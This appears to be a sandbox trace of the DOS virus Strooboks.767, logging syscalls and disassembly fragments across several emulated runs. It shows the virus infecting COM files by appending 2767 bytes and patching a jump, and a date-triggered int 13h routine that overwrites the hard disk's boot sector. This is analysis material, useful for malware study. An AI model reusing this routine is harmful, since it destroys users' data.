Sample viewer

vx.netlux.org/Virus.DOS.Strooboks.767

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:38.533015516Z 48 PC: 14228 | Get DOS version
2018-12-17T22:25:38.535590067Z 44 PC: 14304 | Get time
0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-17T22:25:38.538994009Z 44 PC: 14314 | Get time
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-17T22:25:38.54179466Z 42 PC: 14324 | Get date
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-17T22:25:38.544689771Z 78 PC: 14390 | Find first file
2018-12-17T22:25:38.552692004Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.560069153Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.577835604Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:25:38.598699958Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.600304388Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.607448098Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.619188647Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.621606475Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.625148483Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.63449453Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.646006772Z 61 PC: 143ca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:25:38.654175998Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.656492924Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.664310348Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.675531859Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.677603665Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.681171156Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.687731985Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.699362135Z 61 PC: 143ca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:25:38.707619256Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.709267983Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.716420882Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.729214586Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.731516168Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.734743426Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.741973045Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.752982141Z 61 PC: 143ca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:25:38.76144552Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.763691297Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.771145685Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.782286752Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.784508681Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.788102682Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.794719956Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.805942219Z 61 PC: 143ca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:25:38.814285201Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.815893541Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.823577846Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.836422267Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.839424059Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.842791265Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.850073828Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.862522825Z 61 PC: 143ca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:25:38.870059894Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.872293854Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.879453959Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.891235314Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.897947549Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.901300631Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.908045782Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.919839892Z 61 PC: 143ca | Open file (Filename = 'PAH.COM')
2018-12-17T22:25:38.927271439Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.929165383Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.936696648Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.952352165Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.954733455Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.958002613Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.965830171Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.977139308Z 61 PC: 143ca | Open file (Filename = 'TEST.COM')
2018-12-17T22:25:38.98810318Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.991268678Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.99480687Z 66 PC: 143fa | Move file pointer
2018-12-17T22:25:38.996742248Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:25:39.000413922Z 66 PC: 1440f | Move file pointer
2018-12-17T22:25:39.002151836Z 66 PC: 1442b | Move file pointer
2018-12-17T22:25:39.003698963Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:39.007546488Z 66 PC: 14453 | Move file pointer
2018-12-17T22:25:39.009167419Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-17T22:25:39.018785235Z 66 PC: 1446a | Move file pointer
2018-12-17T22:25:39.021174917Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:25:39.025241349Z 87 PC: 14480 | Get or set file date and time
2018-12-17T22:25:39.027055607Z 87 PC: 14488 | Get or set file date and time
2018-12-17T22:25:39.029001102Z 62 PC: 1448c | Close file
2018-12-17T22:25:39.038759976Z 67 PC: 14497 | Get or set file attributes
2018-12-17T22:25:39.049839511Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:39.055204185Z 62 PC: 143b9 | Close file
2018-12-17T22:25:39.057530416Z 79 PC: 143bd | Find next file
2018-12-17T22:25:39.060292013Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-17T22:25:39.066559606Z 48 PC: 12a8f | Get DOS version
2018-12-17T22:25:39.068687303Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T22:25:39.076308462Z 93 PC: 12afe | File sharing functions
2018-12-17T22:25:39.078618548Z 9 PC: 12a86 | Display string (String= 'Size change=159Eh/05534d. ')
2018-12-17T22:25:39.084166079Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:01.748362813Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:01.750484482Z 44 PC: 14304 | Get time
0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:01.752648399Z 44 PC: 14314 | Get time
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:01.754674871Z 42 PC: 14324 | Get date
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:01.765567999Z 78 PC: 14390 | Find first file
2018-12-25T11:52:01.771650693Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:01.777335168Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:01.804124689Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:01.812134257Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:01.813963056Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:01.825089634Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:01.835380409Z 62 PC: 143b9 | Close file
2018-12-25T11:52:01.837166103Z 79 PC: 143bd | Find next file
2018-12-25T11:52:01.839781105Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:01.846129318Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:01.856562165Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:01.863494503Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:01.865865336Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:01.885096209Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:01.895300589Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:01.906434825Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:01.909191561Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:01.91467097Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:01.924750556Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:01.931167159Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:01.932510683Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:01.939989236Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:01.952727924Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:01.95440153Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:01.957935796Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:01.963894442Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:01.974151115Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:01.981036536Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:01.982383088Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:01.988425651Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:01.99889821Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.001747265Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.004543659Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.015453889Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.034627162Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.041827647Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.043587268Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.050346717Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.060112856Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.061934396Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.065278786Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.071123966Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.08148523Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.089201093Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.090661885Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.096862464Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.107287905Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.109077768Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.111648574Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.117806743Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.127474148Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.13909935Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.141200746Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.14739659Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.157042361Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.159587579Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.162597543Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.168508594Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.178998399Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.18569286Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.187431738Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.195025708Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:02.196866068Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:02.199632399Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:02.202128819Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:02.203902936Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:02.211141668Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:02.213622523Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:02.222466443Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:02.224142848Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:02.227663876Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:02.229381869Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:02.231186599Z 62 PC: 1448c | Close file
2018-12-25T11:52:02.239741731Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:02.249802953Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.254727483Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.256693986Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.260329111Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:02.265937034Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:02.267428743Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:02.275759531Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:02.277912961Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:02.282144229Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:04.337305998Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:04.339194908Z 44 PC: 14304 | Get time
0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:04.353309717Z 44 PC: 14314 | Get time
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:04.355793618Z 42 PC: 14324 | Get date
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:04.358731514Z 78 PC: 14390 | Find first file
2018-12-25T11:52:04.365756728Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:04.372010374Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:04.389978135Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:04.398515033Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:04.400227356Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:04.407270563Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:04.41937919Z 62 PC: 143b9 | Close file
2018-12-25T11:52:04.421604663Z 79 PC: 143bd | Find next file
2018-12-25T11:52:04.424803103Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.432169411Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.443720174Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.451650378Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.453873196Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.459055878Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.46729998Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.474183498Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.476167456Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.479938656Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.491172439Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.499229455Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.500700184Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.507803638Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.52018832Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.52213425Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.525038585Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.538155729Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.549310509Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.556933228Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.559568759Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.566938579Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.578229113Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.581093323Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.584062582Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.590457109Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.602931481Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.610749782Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.61281755Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.620411386Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.632727457Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.635273061Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.638684914Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.646243006Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.657963085Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.665266114Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.667851803Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.675442599Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.686381Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.68937378Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.692139882Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.698093501Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.708708799Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.722157047Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.723875457Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.730948215Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.743393077Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.745413829Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.748097555Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.754720941Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.765344471Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.772372331Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.775148986Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.782627018Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:04.784257635Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:04.788421435Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:04.789982581Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:04.791323881Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:04.800110816Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:04.801882057Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:04.811209368Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:04.813282406Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:04.81792895Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:04.819980178Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:04.822119383Z 62 PC: 1448c | Close file
2018-12-25T11:52:04.832170853Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:04.843283909Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.84886392Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.852064614Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.854892624Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:04.861764935Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:04.864138115Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:04.871873432Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:04.874367134Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:04.88006891Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:05.367364559Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:05.369238199Z 44 PC: 14304 | Get time
0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:05.371416698Z 44 PC: 14314 | Get time
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:05.373594543Z 42 PC: 14324 | Get date
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:05.376690591Z 78 PC: 14390 | Find first file
2018-12-25T11:52:05.382534026Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:05.393090066Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:05.413960617Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:05.41871054Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:05.420656583Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:05.427503313Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:05.438293642Z 62 PC: 143b9 | Close file
2018-12-25T11:52:05.440540176Z 79 PC: 143bd | Find next file
2018-12-25T11:52:05.443575712Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.450053707Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.4606288Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.472349661Z 87 PC: 143d6 | Get or set file date and time (See above)
